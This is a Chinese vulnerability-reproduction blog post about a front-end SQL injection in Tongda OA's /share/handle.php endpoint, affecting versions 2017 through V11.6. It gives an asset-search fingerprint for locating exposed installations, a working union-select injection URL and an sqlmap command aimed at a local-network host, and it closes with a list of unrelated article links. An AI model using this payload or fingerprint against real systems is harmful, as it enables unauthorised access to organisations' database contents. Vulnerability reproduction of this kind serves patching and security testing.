当前位置: 首页 > news >正文

【漏洞复现-通达OA】通达OA share存在前台SQL注入漏洞

一、漏洞简介

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA /share/handle.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。

二、影响版本

● 通达OA2017-通达OAV11.6

三、资产测绘

● hunterapp.name="通达 OA"
● 特征
在这里插入图片描述

四、漏洞复现

/share/handle.php?_GET[module]=1%27={`%27`%202}+union%20select%20user()--+

在这里插入图片描述

sqlmap

  sqlmap -u "http://192.168.31.164/share/handle.php?_GET%5Bmodule%5D=1'=%7B%60'%60%202%7D" --batch

在这里插入图片描述

http://www.lryc.cn/news/302267.html

相关文章:

  • HTML5 Canvas与JavaScript携手绘制动态星空背景
  • 如何优雅地与ChatGPT对话?
  • AI提示工程实战:从零开始利用提示工程学习应用大语言模型【文末送书-19】
  • 量子算法入门——3.狄拉克符号与量子态(3)
  • c++ STL系列——(三)list
  • 软考29-上午题-排序
  • 【详细流程】vue+Element UI项目中使用echarts绘制圆环图 折线图 饼图 柱状图
  • Unity之XR Interaction Toolkit如何在VR中实现一个可以拖拽的UI
  • 开源项目热度榜单
  • Ubuntu系统搭建HadSky论坛并结合内网穿透实现无公网ip远程访问
  • gowin GW1N4 LED
  • Linux ipvlan详解(l2、l3、l3s和bridge、private和vepa模式)
  • 理解并实现OpenCV中的图像平滑技术
  • ChatGPT高效提问—prompt实践(白领助手)
  • Code Composer Studio (CCS) - Comment (注释)
  • springboot/ssm校园菜鸟驿站管理系统Java校园快递取件管理系统
  • 【Mybatis】TypeHandler使用
  • [计算机网络]---网络编程套接字
  • 分布式文件系统 SpringBoot+FastDFS+Vue.js【二】
  • 开源软件:推动软件行业繁荣的力量
  • [杂记]mmdetection3.x中的数据流与基本流程详解(数据集读取, 数据增强, 训练)
  • 阿里云香港轻量应用服务器怎么样,建站速度快吗?
  • 事务及在SpringBoot项目中使用的两种方式
  • stm32--笔记
  • 2024前端面试准备之CSS篇(二)
  • 轨道交通信号增强与覆盖解决方案——经济高效,灵活应用于各类轨道交通场景!
  • 学习数据接构和算法的第10天
  • 初识KMP算法
  • Javaweb之SpringBootWeb案例之AOP概述及入门的详细解析
  • 【Java代码洁癖】NO.2 单元测试mock显式赋值,不能忍